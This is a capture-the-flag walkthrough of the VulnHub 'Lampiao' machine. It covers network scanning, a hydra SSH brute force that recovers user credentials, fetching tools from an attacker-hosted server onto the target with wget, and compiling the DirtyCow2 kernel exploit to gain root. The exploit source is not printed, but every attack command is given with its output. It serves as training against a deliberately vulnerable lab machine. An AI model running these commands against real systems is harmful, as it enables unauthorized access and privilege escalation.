🤠Lampiao

Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! Get root!

1. Reconnaissance

Scanning the network to find vulnerable machine's IP

sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:bb:5e:c1, IPv4: 192.168.10.17
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1	52:54:00:12:35:00	QEMU
192.168.10.2	52:54:00:12:35:00	QEMU
192.168.10.3	08:00:27:4f:a3:78	PCS Systemtechnik GmbH
192.168.10.15	08:00:27:cb:94:c3	PCS Systemtechnik GmbH

We find the IP of the vulnerable machine to be 192.168.10.15

2. Scanning

Using nmap to find the open ports and their services

sudo nmap -Pn -sV -O -p- 192.168.10.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 10:10 EDT
Nmap scan report for 192.168.10.15
Host is up (0.0016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:CB:94:C3 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.44 seconds

We find 3 open ports, tcp ports 22, 80 and 1898 with a ssh and two web servers running respectively

3. Initial Foothold

3.1 Port 80

Nothing of interest here

3.2 Port 1898

We see a static website running on Drupal CMS
We find two potential usernames tiago and eder from this site. Adding this to user.txt
Using cewl to get all the words from the website to a list called pass.txt for brute forcing

sudo cewl http://192.168.10.15:1898 --write Desktop/Vulnhub/lampiao/pass.txt                                                                                                        1m 4s
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Using hydra to try and brute force ssh login credentials with the created user.txt and pass.txt

sudo hydra -L user.txt -P pass.txt ssh://192.168.10.15:22 

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-22 10:35:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1688 login tries (l:2/p:844), ~106 tries per task
[DATA] attacking ssh://192.168.10.15:22/
[22][ssh] host: 192.168.10.15   login: tiago   password: Virgulino
[STATUS] 897.00 tries/min, 897 tries in 00:01h, 796 to do in 00:01h, 16 active

We get the credentials tiago : Virgulino

Connecting as user tiago via ssh

ssh tiago@192.168.10.15

tiago@lampiao:/$ sudo -l
[sudo] password for tiago:
Sorry, user tiago may not run sudo on lampiao

tiago does not have any sudo vectors.

4. Privilege Escalation

4.1 Linux exploit suggester

Downloading the linux-exploit-suggester script to the attacker machine

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

Hosting a python server in the directory of the downloaded script

python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Pulling the script from the attacker machine to the target machine in the /tmp directory as this directory provides read, write and execute permission for all the users

tiago@lampiao:/tmp$ wget 192.168.10.21:8000/linux-exploit-suggester.sh
--2022-03-25 11:43:23--  http://192.168.10.21:8000/linux-exploit-suggester.sh
Connecting to 192.168.10.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 89614 (88K) [text/x-sh]
Saving to: ‘linux-exploit-suggester.sh’

100%[========================>] 89,614      --.-K/s   in 0s      

2022-03-25 11:43:23 (599 MB/s) - ‘linux-exploit-suggester.sh’ saved [89614/89614]

Executing the script

chmod +x linux-exploit-suggester.sh

./linux-exploit-suggester.sh

Available information:

Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 14.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

78 kernel space exploits
49 user space exploits

Possible Exploits:

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,[ ubuntu=14.04 ]{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: highly probable
   Tags: [ ubuntu=14.04{kernel:4.4.0-*} ],ubuntu=16.04{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: highly probable
   Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

==================================================================================

4.2 DirtyCow2

Use exploit dirtycow2 and downloading it to the attacker machine from ext-url: https://www.exploit-db.com/download/40847
Hosting a python server in the downloaded directory and pulling the file from the target machine

tiago@lampiao:/tmp$ wget 192.168.10.21:8000/40847.cpp

--2022-03-25 11:45:37--  http://192.168.10.21:8000/40847.cpp
Connecting to 192.168.10.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10531 (10K) [text/x-c++src]
Saving to: ‘40847.cpp’

100%[========================>] 10,531      --.-K/s   in 0s      

2022-03-25 11:45:37 (323 MB/s) - ‘40847.cpp’ saved [10531/10531]

Looking at the source code, the developer has specified the commands for executing their script in EDB-Note section

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

./dcow -s

Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

root@lampiao:~ echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~ cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~ rm /tmp/.ssh_bak
root@lampiao:~ whoami
root

We are root. Moving into the /root directory, we get the flag

cd /root
ls
flag.txt
cat flag.txt
9740616875908d91ddcdaa8aea3af366

PreviousHacker Fest NextNode

Last updated 3 years ago

1. Reconnaissance

2. Scanning

3. Initial Foothold

3.1 Port 80

3.2 Port 1898

3.3 Brute forcing ssh login

4. Privilege Escalation

4.1 Linux exploit suggester

4.2 DirtyCow2